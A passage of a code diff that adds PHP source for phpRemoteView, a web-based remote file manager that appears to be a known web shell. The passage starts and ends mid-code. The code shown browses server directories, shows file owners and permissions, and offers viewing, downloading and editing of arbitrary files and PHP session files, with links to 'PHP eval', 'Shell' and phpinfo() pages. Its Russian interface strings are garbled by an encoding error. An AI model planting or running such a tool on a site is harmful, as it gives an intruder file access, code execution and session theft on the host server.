+"Sort order"=>"Ïîğÿäîê ñîğòèğîâêè",
+"Ascending sort"=>"Ïî âîçğàñòàíèş",
+"Descending sort"=>"Ïî óáûâàíèş",
+"Sort by filename"=>"Ñîğòèğîâàòü ïî èìåíè ôàéëà",
+"Sort by filename extension"=>"Ñîğòèğîâàòü ïî ğàñøèğåíèş ôàéëà",
+"Date/time format"=>"Ôîğìàò äàòû/âğåìåíè",
+"Panel font & size"=>"Øğèôò/ğàçìåğ ïàíåëè",
+"Setup"=>"Îïöèè",
+"Char map"=>"Ñèìâîëû",
+"Language"=>"ßçûê",
+"English"=>"Àíãëèéñêèé",
+"Russian"=>"Ğóññêèé",
+"Character map (symbol codes table)"=>"Òàáëèöà ñèìâîëîâ",
+"Select font"=>"Âûáåğèòå øğèôò",
+"or type other"=>"èëè ââåäèòå äğóãîé",
+"Font size"=>"Ğàçìåğ øğèôòà",
+"Code limit"=>"Äèïàçîí êîäîâ",
+"Generate table"=>"Ñãåíåğèğîâàòü òàáëèöó",
+"Universal convert"=>"Óíèâåğñàëüíûå êîíâåğòàöèè"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"Òèï",
+'n'=>"Èìÿ",
+'s'=>"Ğàçìåğ",
+'o'=>"Âëàäåëåö",
+'g'=>"Ãğóïïà",
+'a'=>"Âëàäåëåö/Ãğóïïà",
+'c'=>"Ïğàâà",
+'1'=>"Ñîçäàí",
+'2'=>"Èçìåíåí",
+'3'=>"Äîñòóï"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=2&fnot=1><b>".mm("Image")."</b></a>]
+[<a href=$self/".urlencode($notepad)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1&fatt=".urlencode($notepad)."><b>".mm("Notepad")."</b></a>]
+[<a href=$self/".urlencode($f)."?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=3&fnot=1><b>".mm("DOWNLOAD")."</b></a>]
+[<a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Edit")."</b></a>]
+</small>";
+}
+
+
+function exitw() {
+exit("<table width=100% border=0 cellspacing=2 cellpadding=0 bgcolor=#ffdddd>
+<tr><td align=center>
+".mm("Sorry, this programm run in read-only mode.")."<br>
+".mm("For full access: write")." `<tt><nobr><b>\$write_access=<u>true</u>;</b></nobr></tt>` 
+".mm("in this php-file").".</td></tr></table>
+");
+}
+
+
+
+function ob() {
+   global $obb_flag, $obb;
+   if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
+   if (function_exists("ob_start")) {
+      if ($GLOBALS['obb_flag']) ob_end_clean();
+      ob_start();
+      $GLOBALS['obb_flag']=1;
+   }
+}
+
+function obb() {
+   global $obb;
+   if (function_exists("ob_start")) {
+      $obb=ob_get_contents();
+      ob_end_clean();
+      $obb="<P>
+<table bgcolor=#ff0000 width=100% border=0 cellspacing=1 cellpadding=0><tr><td>
+<table bgcolor=#ccccff width=100% border=0 cellspacing=0 cellpadding=3><tr><td align=center>
+<b>".mm("Reason").":</b></td></tr></table>
+</td></tr><tr><td>
+<table bgcolor=#ffcccc width=100% border=0 cellspacing=0 cellpadding=3><tr><td>
+$obb<P>
+</td></tr></table>
+</table><P>";
+      $GLOBALS['obb_flag']=0;
+   }
+}
+
+function sizeparse($size) {
+   return strrev(preg_replace("!...!","\\0 ",strrev($size)));
+}
+
+
+function jsval($msg) {
+   $msg=str_replace("\\","\\\\",$msg);
+   $msg=str_replace("\"","\\\"",$msg);
+   $msg=str_replace("'","\\'",$msg);
+   return '"'.$msg.'",';
+}
+
+
+
+///////////////////////////////////////////////////////////////////////////
+
+
+switch($c) {
+
+
+// listing
+case "l":
+
+   echo $GLOBALS['html'];
+
+   if (!realpath($d)) die("".mm("Error path").". <a href=$self>".mm("Click here for start")."</a>.");
+
+   //up($d);
+   
+   ob();
+   $di=dir($d);
+   obb();
+
+   $dirs=array();
+   $files=array();
+
+   if (!$di) exit("<a href=$self?&c=l&d=".urlencode(realpath($d."..")).
+      "><nobr>&lt;&lt;&lt; <b>".mm("up directory")."</b> &gt;&gt;&gt;</nobr></a> <p>".
+      "<font color=red><b>".mm("access denied")."</b></font>: $obb");
+   while (false!==($name=$di->read())) {
+      if ($name=="." || $name=="..") continue;
+      if (@is_dir($d.$name)) { 
+         $dirs[]=strval($name);
+         $fstatus[$name]=0;
+      }
+      else {
+         $files[]=strval($name);
+         $fstatus[$name]=1;
+      }
+      $fsize[$name]=@filesize($d.$name);
+      $ftype[$name]=@filetype($d.$name);
+      if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
+      $fperms[$name]=@fileperms($d.$name);
+      $fmtime[$name]=@filemtime($d.$name);
+      $fatime[$name]=@fileatime($d.$name);
+      $fctime[$name]=@filectime($d.$name);
+      $fowner[$name]=@fileowner($d.$name);
+      $fgroup[$name]=@filegroup($d.$name);
+      if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok)) 
+         $fext[$name]=strtolower($ok[1]); 
+      else 
+         $fext[$name]="";
+   }
+   $di->close();
+
+   $listsort=array();
+   if (count($dirs))
+   foreach ($dirs as $v) {
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+   $names=$listsort;
+   //echo "<pre>";print_r($names);
+   if ($cc[1]) arsort($names); else asort($names);
+   //echo "<pre>";print_r($names);
+
+   $listsort=array();
+   if (count($files))
+   foreach ($files as $v) {
+       $v=strval($v);
+       switch ($cc[0]) {
+          case "e": $listsort[$v]=$fext[$v].' '.$v; break;
+          case "n": $listsort[$v]=strtolower($v); break;
+          default:
+             switch ($cn[$cc[0]]) {
+                case "n": $listsort[$v]=strtolower($v); break;
+                case "t": $listsort[$v]=$ftype[$v]; break;
+                case "s": $listsort[$v]=$fsize[$v]; break;
+                case "o": $listsort[$v]=$fowner[$v]; break;
+                case "g": $listsort[$v]=$fgroup[$v]; break;
+                case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
+                case "c": $listsort[$v]=$fperms[$v]; break;
+                case "1": $listsort[$v]=$fctime[$v]; break;
+                case "2": $listsort[$v]=$fmtime[$v]; break;
+                case "3": $listsort[$v]=$fatime[$v]; break;
+          
+             }
+      }
+   }
+
+
+   //echo "<pre>DIRS:"; print_r($names);
+   if ($cc[1]) arsort($listsort); else asort($listsort);
+   //$names=array_merge($names,$listsort);
+   foreach ($listsort as $k=>$v) $names[$k]=$v;
+   //echo "<pre>FILES:"; print_r($listsort);
+   //echo "<pre>NAMES:"; print_r($names);
+
+?>
+<STYLE>
+.title {
+color: 'black';
+background: #D4D0C8;
+text-align: 'center';
+BORDER-RIGHT:   #888888 1px outset;
+BORDER-TOP:     #ffffff 2px outset;
+BORDER-LEFT:    #ffffff 1px outset;
+BORDER-BOTTOM:  #888888 1px outset;
+}
+.window {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+BACKGROUND-COLOR: #D4D0C8;
+CURSOR: default;
+}
+.window1 {
+BORDER-RIGHT:  #eeeeee 1px solid;
+BORDER-TOP:    #808080 1px solid;
+BORDER-LEFT:   #808080 1px solid;
+BORDER-BOTTOM: #eeeeee 1px solid;
+FONT: 8pt Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+}
+.line {
+BORDER-RIGHT:   #cccccc 1px solid;
+BORDER-TOP:     #ffffff 1px solid;
+BORDER-LEFT:    #ffffff 1px solid;
+BORDER-BOTTOM:  #cccccc 1px solid;
+font: <?php echo $cp[4]; ?>pt <?php echo $cp[3]; ?>;
+}
+.line2 {
+background: #ffffcc;
+}
+.black {color: black}
+a:link.black {color: black}
+a:active.black {color: black}
+a:visited.black {color: black}
+a:hover.black {color: #0000ff}
+
+.white {color: white}
+a:link.white{color: white}
+a:active.white{color: white}
+a:visited.white{color: white}
+a:hover.white{color: #ffff77}
+
+a:link     {color: #000099;}
+a:active   {color: #000099;}
+a:visited  {color: #990099;}
+a:hover    {color: #ff0000;}
+a {
+CURSOR: default;
+}
+.windowtitle {
+font: 9pt; Tahoma, Verdana, Geneva, Arial, Helvetica, sans-serif;
+font-weight: bold;
+color: white;
+}
+.sym {
+font: 14px Wingdings;
+}
+</STYLE>
+
+<?php
+
+function up2($d) {
+   global $win,$self;
+   $d=str_replace("\\","/",$d);
+   if (substr($d,-1)!="/") $d.="/";
+   $d=str_replace("//","/",$d);
+
+   $n=explode("/",$d);
+   unset($n[count($n)-1]);
+
+   $path="";
+   for ($i=0; $i<count($n); $i++) {
+      $path="$path$n[$i]/";
+      if ($i==0) $path=strtoupper($path);
+      $paths[]=$path;
+   }
+
+   $out="";
+   $sum=0;
+   $gr=70;
+   for ($i=0; $i<count($n); $i++) {
+      $out.="<a href=$self?c=l&d=".urlencode($paths[$i])." class=white>";
+      if (strlen($d)>$gr && $i>0 && $i+1<count($n)) {
+         if (strlen($d)-$sum>$gr) {
+            $out.="••";
+            $sum+=strlen($n[$i]);
+         }
+         else 
+            $out.=$n[$i];
+      }
+      else 
+         if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
+      $out.="/</a>";
+
+   }
+
+   return $out;
+   return "<font size=-2>$d</font>";
+}
+
+$ext=array();
+$ext['html']=array('html','htm','shtml');
+$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
+$ext['exe']=array('exe','com','pif','src','lnk');
+$ext['php']=array('php','phtml','php3','php4','inc');
+$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
+
+
+   echo "\n\n\n<script>\nfunction tr(";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "a$i,";
+   }
+   echo "x) {\ndocument.write(\"<tr bgcolor=#eeeeee";
+//   echo " onMouseOver='this.style.value=\\\"line2\\\"' onMouseOut='this.style.value=\\\"line\\\"'>";
+   echo " onMouseOver='this.style.backgroundColor=\\\"#FFFFCC\\\"' onMouseOut='this.style.backgroundColor=\\\"\\\"'>";
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo '<td align='.$cn_align[$cn[$i]].' class=line ';
+      switch ($cn[$i])  {
+         case 's': case 'c':  case '1':  case '2':  case '3': case 't':
+            echo ' nowrap'; 
+      }
+      echo ">";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "\"+a$i+\"";
+      if ($cn[$i]!='t' && $cn[$i]!='n') echo "\xA0";
+      echo "</td>";
+   }
+   echo "</tr>\");\n}";
+   echo "\n\n</script>\n\n\n";
+
+
+   //phpinfo();
+   //echo implode(" | ",$cp);
+   echo '<table border=0 cellspacing=2 cellpadding=0 bgcolor=#cccccc 
+      class=window align=center width=60%><form name=main>';
+
+   echo '<tr><td colspan='.strlen($cn).' bgcolor=#0A246A background="'.
+   $self.'?c=img&name=fon&r=" class=windowtitle>';
+
+         echo '<table width=100% border=0 cellspacing=0 cellpadding=2 class=windowtitle><tr><td>'.
+         '<a href='.$self.'><img src='.$self.'?c=img&name=dir border=0></a>'.
+         up2($d.$f).'</td></tr></table>';
+
+   echo '</td></tr>'.
+   '<tr><td>'.
+   '<table width=100% border=0 cellspacing=0 cellpadding=0 class=window1><tr>';
+
+   $button_help=array(
+   'up'=>"UP DIR",
+   'refresh'=>"RELOAD",
+   'mode'=>'SETUP, folder option',
+   'edit'=>'DIR INFO',
+   'home'=>'HomePage',
+   'papki'=>'TREE',
+   'setup'=>'PHP eval, Shell',
+   'back'=>'BACK',
+   );
+
+   function button_url($name) {
+      global $self,$d,$f,$uurl;
+      switch ($name) {
+         case 'up': return "$self?c=l&d=".urlencode(realpath($d.".."));
+         case 'refresh': return "$self?c=l&r=".rand(0,10000)."&d=".urlencode($d);
+         case 'mode': return "$self?c=setup&ref=$uurl";
+         case 'edit': return "$self?c=d&d=".urlencode($d);
+         case 'home': return "http://php.spb.ru/remview/";
+         case 'papki': return "$self?c=tree&d=".urlencode($d);
+         case 'setup': return "$self?c=t";
+         case 'back': return "javascript:history.back(-1)";
+      }
+   }
+   echo '<td colspan='.strlen($cn).'>
+   <table border=0 cellspacing=0 cellpadding=2><tr>';
+   $buttons=array('back','up','refresh','edit','mode','disk','full','papki','setup','home');
+   $tmp=strtoupper($d[0]);
+   for ($i=0; $i<count($buttons); $i++) {
+      if ($buttons[$i]=='full') {
+         echo '<td class=window width=90% align=center nowrap><font color=#999999 face="Arial Black" 
+         style="font-size: 11pt;">&lt;?php<u>R</u>emote<u>V</u>iew?&gt;</font></td>';
+         continue;
+      }
+      if ($buttons[$i]=='disk') {
+         if (!$win) continue;
+         echo '<td width=1% title=\'Select dist\' class=window onMouseOver="this.style.backgroundColor=\'#eeee88\'" '.
+              ' onMouseOut="this.style.backgroundColor=\'\'">';
+         echo "<select name=disk size=1; style='font: 9pt Arial Black; color: #999999 '
+         onChange='location.href=\"$self?c=l&d=\"+document.main.disk.options[document.main.disk.selectedIndex].value+\":/\"'>";
+         for ($j=ord('A'); $j<=ord('Z'); $j++) 
+            echo '<option value="'.chr($j).'"'.(chr($j)==$tmp?" selected":"").'>'.chr($j);
+         echo "</select></td>";
+         continue;
+      }
+      $bturl=button_url($buttons[$i]);
+      echo '<td width=1% title=\''.$button_help[$buttons[$i]].'\' class=window'.
+           ' onMouseMove="this.style.backgroundColor=\'#eeee88\';window.status=\'** '.$button_help[$buttons[$i]].' ** '.$bturl.'\'"'.
+           ' onMouseOut="this.style.backgroundColor=\'\';window.status=\'\'"'.
+           ' onClick=\'location.href="'.$bturl.'"\'><a href=';
+      echo button_url($buttons[$i]);
+      echo '><img HSPACE=3 border=0 src='.$self.'?c=img&name='.$buttons[$i].'></a></td>';
+   }
+   echo '</tr></table>
+   </td></tr><tr>';
+
+
+   for ($i=0; $i<strlen($cn); $i++) {
+      echo "<td nowrap class=title onClick='location.href=\"".
+           "$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl\"'";
+      switch ($cn[$i]) {
+         case 1: case 2: case 3: case "s": echo " width=13%"; break;
+         case 't': echo " width=2%"; break;
+         case 'n': echo " width=40%"; break;
+      }
+      echo "><a href='$self?c=set&c2=sort&name=$i&pan=$panel&ref=$uurl' class=black>";
+      switch ($cn[$i]) {
+         case "n": case "t": case "s": case "o": case "g": 
+         case "a": case "c": case "1": case "2": case "3": 
+            echo "\xA0".$cn_name[$cn[$i]]."\xA0"; break;
+         default: 
+            echo "??$cn[$i]??";
+      }
+      if ($cc[0]==="$i") {
+         if ($cc[1]=='0') echo "<img src=$self?c=img&name=sort_asc border=0>";
+         else echo "<img src=$self?c=img&name=sort_desc border=0>";
+      }
+      echo '</a></td>';
+   }
+   echo '</tr>';
+   
+   echo "\n\n<script>\n\n";
+   foreach ($names as $k=>$v) {
+
+      echo "\n\n// $k \n";
+      echo 'tr(';
+      
+      for ($i=0; $i<strlen($cn); $i++) {
+
+         switch ($cn[$i]) {
+         
+            case 'n': 
+               switch($ftype[$k]) {
+               case 'file':
+                  $vv=strtolower(substr($k,strlen($k)-4,4));
+                  $add="";
+                  if ($vv==".gif" || $vv==".jpg" || $vv==".png" || $vv==".bmp"
+                     || $vv==".ico" || $vv=="jpeg") $add="&ftype=2&fnot=1";
+                  if (substr($k,0,5)=="sess_") $add="&ftype=4";
+                  $ln='<a href='.$self.'?&c=v&d='.urlencode($d).
+                  '&f='.urlencode($k).$add.'>';
+                  break;
+
+               default:
+                  $ln='<a href='.$self.'?&c=l&d='.urlencode($d.$k).'>';
+                  break;
+               }
+               
+               if ($ftype[$k]=='dir') 
+                  $ln.='<img src='.$self.'?c=img&name=dir border=0>';
+               else {
+                  $found=0;
+                  foreach ($ext as $kk=>$vv) {
+                     if (in_array(strtolower($fext[$k]),$vv)) {
+                        $ln.='<img src='.$self.'?c=img&name='.$kk.' border=0>';
+                        $found=1;
+                        break;
+                     }
+                  }
+                  if (!$found)
+                     $ln.='<img src='.$self.'?c=img&name=unk border=0>';
+               }
+               $ln.=substr($k,0,48).'</a>';
+               echo jsval($ln);
+
+               break; 
+
+            case "t": 
+               switch ($ftype[$k]) {
+               case "dir":
+                  echo jsval("<a href=$self?c=d&d=".urlencode($d.$k).">DIR</a>"); 
+                  break;
+               case "file":
+                  echo jsval("<a href=$self/".urlencode($k)."?&c=v&fnot=1&ftype=3&d=".
+                     urlencode($d)."&f=".urlencode($k)." class=sym>\xF2</a> ".
+                     "<a href=$self?&c=i&d=".urlencode($d)."&f=".urlencode($k)." class=sym>\xF0</a>");
+                  break;
+               case "link":
+                  echo jsval("<font class=t>&#8212;&gt;</font>");
+                  break;
+               default:
+                  echo jsval("??");
+                  break;
+               }
+               break;
+            
+            case "s": 
+               if ($ftype[$k]=='file') echo jsval(sizeparse($fsize[$k])); 
+               else echo jsval(''); 
+               break;
+            
+            case "o": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               echo jsval($tow);
+               break;
+            
+            case "g": 
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval($tgr);
+               break;
+            
+            case "a": 
+               $tmp=@_posix_getpwuid($fowner[$k]);
+               if (!isset($tmp['name']) || $tmp['name']=="") $tow=$fowner[$k];
+               else $tow=$tmp['name'];
+               $tmp2=@_posix_getgrgid($fgroup[$k]);
+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
